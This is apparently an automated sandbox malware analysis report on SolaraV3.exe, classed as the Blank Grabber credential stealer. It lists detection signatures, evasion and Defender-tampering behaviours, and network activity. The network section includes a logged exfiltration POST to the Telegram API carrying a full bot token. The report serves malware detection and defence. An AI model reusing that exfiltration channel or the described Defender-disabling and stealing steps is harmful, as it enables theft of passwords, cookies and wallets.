Windows Analysis Report
SolaraV3.exe

Overview

General Information

Sample name:	SolaraV3.exe
Analysis ID:	1525849
MD5:	7dd77a8611b56c1ed090293e3ab40f08
SHA1:	1cb4be6453ab5dbeebd8339e0ec4264d6efa611c
SHA256:	5d887dd72893e3bd40b291a1dc3ea2bc94f6d0daf4de318bd1005b57fbe114ca
Tags:	exeuser-aachum
Infos:

Detection

Blank Grabber

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Sigma detected: Capture Wi-Fi password

Suricata IDS alerts for network traffic

Yara detected Blank Grabber

Yara detected Telegram RAT

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Bypasses PowerShell execution policy

Check if machine is in data center or colocation facility

Encrypted powershell cmdline option found

Found many strings related to Crypto-Wallets (likely being stolen)

Found pyInstaller with non standard icon

Loading BitLocker PowerShell Module

Modifies Windows Defender protection settings

Modifies existing user documents (likely ransomware behavior)

Modifies the hosts file

Potentially malicious time measurement code found

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Removes signatures from Windows Defender

Sigma detected: Dot net compiler compiles file from suspicious location

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Sigma detected: Powershell Defender Disable Scan Feature

Sigma detected: Rar Usage with Password and Compression Level

Sigma detected: Suspicious Encoded PowerShell Command Line

Sigma detected: Suspicious PowerShell Encoded Command Patterns

Sigma detected: Suspicious Startup Folder Persistence

Suspicious powershell command line found

Tries to harvest and steal WLAN passwords

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Crypto Currency Wallets

Uses attrib.exe to hide files

Uses cmd line tools excessively to alter registry or file data

Uses netsh to modify the Windows network and firewall settings

Uses the Telegram API (likely for C&C communication)

Writes or reads registry keys via WMI

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Compiles C# or VB.Net code

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to shutdown / reboot the system

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Creates a window with clipboard capturing capabilities

Creates files inside the system directory

Detected potential crypto function

Drops PE files

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evaded block containing many API calls

Found evasive API chain checking for process token information

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

PE file contains an invalid checksum

PE file contains executable resources (Code or Archives)

PE file contains sections with non-standard names

Queries disk information (often used to detect virtual machines)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Searches for the Microsoft Outlook file path

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI

Sigma detected: Powershell Defender Exclusion

Sigma detected: SCR File Write Event

Sigma detected: Startup Folder File Write

Sigma detected: Suspicious Execution of Powershell with Base64

Sigma detected: Suspicious Screensaver Binary File Creation

Sigma detected: Use Short Name Path in Command Line

Steals Internet Explorer cookies

Stores files to the Windows start menu directory

Too many similar processes found

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Uses reg.exe to modify the Windows registry

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Very long command line found

Yara detected Credential Stealer

Classification

Signatures

AV Detection

Multi AV Scanner detection for submitted file

Source: SolaraV3.exe

ReversingLabs: Detection: 55%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe

Code function: 110_2_00007FF74EE8901C CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,

110_2_00007FF74EE8901C

Source: SolaraV3.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source:	Binary string: D:\a\1\b\bin\amd64\select.pdb source: SolaraV3.exe, 00000002.00000002.2054170176.00007FFB1E4C1000.00000040.00000001.01000000.0000000D.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: SolaraV3.exe, 00000002.00000002.2046985205.00007FFB0B7FC000.00000040.00000001.01000000.00000013.sdmp
Source:	Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASMOpenSSL 1.1.1t 7 Feb 2023built on: Thu Feb 9 15:27:40 2023 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-1_1"not available source: SolaraV3.exe, 00000002.00000002.2047840849.00007FFB0BA60000.00000040.00000001.01000000.0000000F.sdmp
Source:	Binary string: d:\a01\_work\12\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: SolaraV3.exe, 00000001.00000003.1559590237.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2053703446.00007FFB1C3C1000.00000002.00000001.01000000.00000005.sdmp, VCRUNTIME140.dll.1.dr
Source:	Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: SolaraV3.exe, SolaraV3.exe, 00000002.00000002.2051655996.00007FFB0C5F1000.00000040.00000001.01000000.00000006.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: SolaraV3.exe, SolaraV3.exe, 00000002.00000002.2051929047.00007FFB18B71000.00000040.00000001.01000000.00000011.sdmp
Source:	Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_A source: SolaraV3.exe
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdbMM source: SolaraV3.exe, 00000002.00000002.2051343700.00007FFB0C5DB000.00000040.00000001.01000000.00000008.sdmp
Source:	Binary string: D:\a\1\b\libssl-1_1.pdb@@ source: SolaraV3.exe, 00000002.00000002.2050155704.00007FFB0C3C6000.00000040.00000001.01000000.00000010.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\python310.pdb source: SolaraV3.exe, 00000002.00000002.2049056875.00007FFB0BECF000.00000040.00000001.01000000.00000004.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: SolaraV3.exe, SolaraV3.exe, 00000002.00000002.2053917460.00007FFB1E471000.00000040.00000001.01000000.00000012.sdmp
Source:	Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASM source: SolaraV3.exe, 00000002.00000002.2047840849.00007FFB0BA60000.00000040.00000001.01000000.0000000F.sdmp
Source:	Binary string: ;C:\Users\user\AppData\Local\Temp\se3yji4z\se3yji4z.pdb source: powershell.exe, 0000004A.00000002.1847941368.00000239E7D72000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: ;C:\Users\user\AppData\Local\Temp\se3yji4z\se3yji4z.pdbhP@ source: powershell.exe, 0000004A.00000002.1847941368.00000239E7D72000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: SolaraV3.exe, 00000002.00000002.2051343700.00007FFB0C5DB000.00000040.00000001.01000000.00000008.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: SolaraV3.exe, SolaraV3.exe, 00000002.00000002.2053371221.00007FFB1C251000.00000040.00000001.01000000.00000009.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: SolaraV3.exe, 00000002.00000002.2050924426.00007FFB0C441000.00000040.00000001.01000000.0000000B.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: SolaraV3.exe, 00000002.00000002.2052555001.00007FFB1AB01000.00000040.00000001.01000000.0000000C.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: SolaraV3.exe, 00000002.00000002.2052925726.00007FFB1BB11000.00000040.00000001.01000000.0000000A.sdmp
Source:	Binary string: D:\a\1\b\libcrypto-1_1.pdb source: SolaraV3.exe, SolaraV3.exe, 00000002.00000002.2047840849.00007FFB0BAE2000.00000040.00000001.01000000.0000000F.sdmp
Source:	Binary string: D:\Projects\WinRAR\rar\build\rar64\Release\RAR.pdb source: rar.exe, 0000006E.00000000.1923151482.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmp, rar.exe, 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmp, rar.exe.1.dr
Source:	Binary string: D:\a\1\b\libssl-1_1.pdb source: SolaraV3.exe, SolaraV3.exe, 00000002.00000002.2050155704.00007FFB0C3C6000.00000040.00000001.01000000.00000010.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: SolaraV3.exe, SolaraV3.exe, 00000002.00000002.2050619713.00007FFB0C411000.00000040.00000001.01000000.0000000E.sdmp

Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 1_2_00007FF6DC709280 FindFirstFileExW,FindClose,	1_2_00007FF6DC709280
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 1_2_00007FF6DC7083C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	1_2_00007FF6DC7083C0
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 1_2_00007FF6DC721874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	1_2_00007FF6DC721874
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FF6DC709280 FindFirstFileExW,FindClose,	2_2_00007FF6DC709280
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FF6DC721874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	2_2_00007FF6DC721874
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FF6DC7083C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	2_2_00007FF6DC7083C0
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B81322E MultiByteToWideChar,GetLastError,MultiByteToWideChar,MultiByteToWideChar,00007FFB2AD9F020,FindFirstFileW,FindNextFileW,WideCharToMultiByte,	2_2_00007FFB0B81322E
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EE946EC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	110_2_00007FF74EE946EC
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EED88E0 FindFirstFileExA,	110_2_00007FF74EED88E0
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EE8E21C FindFirstFileW,FindClose,CreateFileW,DeviceIoControl,CloseHandle,	110_2_00007FF74EE8E21C

Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2857751 - Severity 1 - ETPRO MALWARE SynthIndi Loader Exfiltration Activity (POST) : 192.168.2.7:49733 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2857752 - Severity 1 - ETPRO MALWARE SynthIndi Loader CnC Response : 149.154.167.220:443 -> 192.168.2.7:49733

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 208.95.112.1 208.95.112.1

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: TUT-ASUS TUT-ASUS

May check the online IP address of the machine

Source: unknown	DNS query: name: ip-api.com
Source: unknown	DNS query: name: ip-api.com

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comAccept-Encoding: identityUser-Agent: python-urllib3/2.2.3
Source: global traffic	HTTP traffic detected: GET /json/?fields=225545 HTTP/1.1Host: ip-api.comAccept-Encoding: identityUser-Agent: python-urllib3/2.2.3

Source: SolaraV3.exe, 00000002.00000002.2043957200.000001FC25BCC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: `https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: SolaraV3.exe, 00000002.00000002.2043957200.000001FC25BCC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: `https://www.youtube.com/ equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: blank-a0m8c.in
Source: global traffic	DNS traffic detected: DNS query: ip-api.com
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: unknown

HTTP traffic detected: POST /bot7576687091:AAHc9LHp1oJNmPES1PMfu8JQQ9jVtHibTlc/sendDocument HTTP/1.1Host: api.telegram.orgAccept-Encoding: identityContent-Length: 727354User-Agent: python-urllib3/2.2.3Content-Type: multipart/form-data; boundary=1c1a3fa26118796b784a6413d888e095

Source: SolaraV3.exe, 00000001.00000003.1562816571.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.co
Source: SolaraV3.exe, 00000001.00000003.1562285520.000001EA2312C000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1562285520.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, libffi-7.dll.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: SolaraV3.exe, 00000001.00000003.1562816571.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560072884.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559743250.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560147276.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563848325.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563848325.000001EA2312C000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560368534.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1564291533.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563980911.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560266326.000001EA2312C000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560266326.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560491890.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559946901.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1562526846.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560625770.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559830158.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1561239565.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, sqlite3.dll.1.dr, libssl-1_1.dll.1.dr, unicodedata.pyd.1.dr, _ssl.pyd.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: SolaraV3.exe, 00000001.00000003.1562285520.000001EA2312C000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1562285520.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, libffi-7.dll.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: SolaraV3.exe, 00000001.00000003.1562816571.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560072884.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559743250.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560147276.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563848325.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560368534.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1564291533.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563980911.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560266326.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560491890.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559946901.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1562526846.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560625770.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559830158.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1561239565.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, sqlite3.dll.1.dr, libssl-1_1.dll.1.dr, unicodedata.pyd.1.dr, _ssl.pyd.1.dr, _lzma.pyd.1.dr, _decimal.pyd.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: SolaraV3.exe, 00000001.00000003.1562816571.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560072884.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559743250.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560147276.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563848325.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560368534.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1564291533.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563980911.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560266326.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560491890.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559946901.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1562526846.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560625770.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559830158.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1561239565.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, sqlite3.dll.1.dr, libssl-1_1.dll.1.dr, unicodedata.pyd.1.dr, _ssl.pyd.1.dr, _lzma.pyd.1.dr, _decimal.pyd.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: SolaraV3.exe, 00000001.00000003.1562816571.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560072884.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559743250.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560147276.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563848325.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563848325.000001EA2312C000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560368534.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1564291533.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563980911.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560266326.000001EA2312C000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560266326.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560491890.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559946901.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1562526846.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560625770.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559830158.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1561239565.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, sqlite3.dll.1.dr, libssl-1_1.dll.1.dr, unicodedata.pyd.1.dr, _ssl.pyd.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: SolaraV3.exe, 00000002.00000003.2036193521.000001FC252B9000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1921552847.000001FC252B9000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1772675599.000001FC252B9000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1708990356.000001FC252B9000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2038979504.000001FC252B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://code.activestate.com/recipes/577452-a-memoize-decorator-for-instance-methods/
Source: SolaraV3.exe, rar.exe.1.dr	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: SolaraV3.exe, 00000002.00000002.2039145947.000001FC252EE000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2039829113.000001FC2536E000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.2035293287.000001FC252EE000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2039554025.000001FC25361000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.2035172460.000001FC25320000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1728427931.000001FC252EE000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1708604492.000001FC252EE000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.2034874254.000001FC25360000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1684359906.000001FC2531E000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1743305378.000001FC252ED000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.2035050176.000001FC2536A000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.2036060899.000001FC25325000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1695774309.000001FC252E7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1794892126.00000267C15D3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.2811239822.000001407C800000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000004A.00000002.1908054026.00000239FE760000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: SolaraV3.exe	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
Source: SolaraV3.exe	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: SolaraV3.exe, 00000001.00000003.1563354403.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, rar.exe.1.dr	String found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
Source: SolaraV3.exe, 00000001.00000002.2058209847.000001EA23108000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.j$
Source: SolaraV3.exe, 00000001.00000003.1562285520.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563354403.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, rar.exe.1.dr, libffi-7.dll.1.dr	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: powershell.exe, 0000004A.00000002.1908054026.00000239FE760000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.v
Source: svchost.exe, 0000001A.00000002.2811239822.000001407C800000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
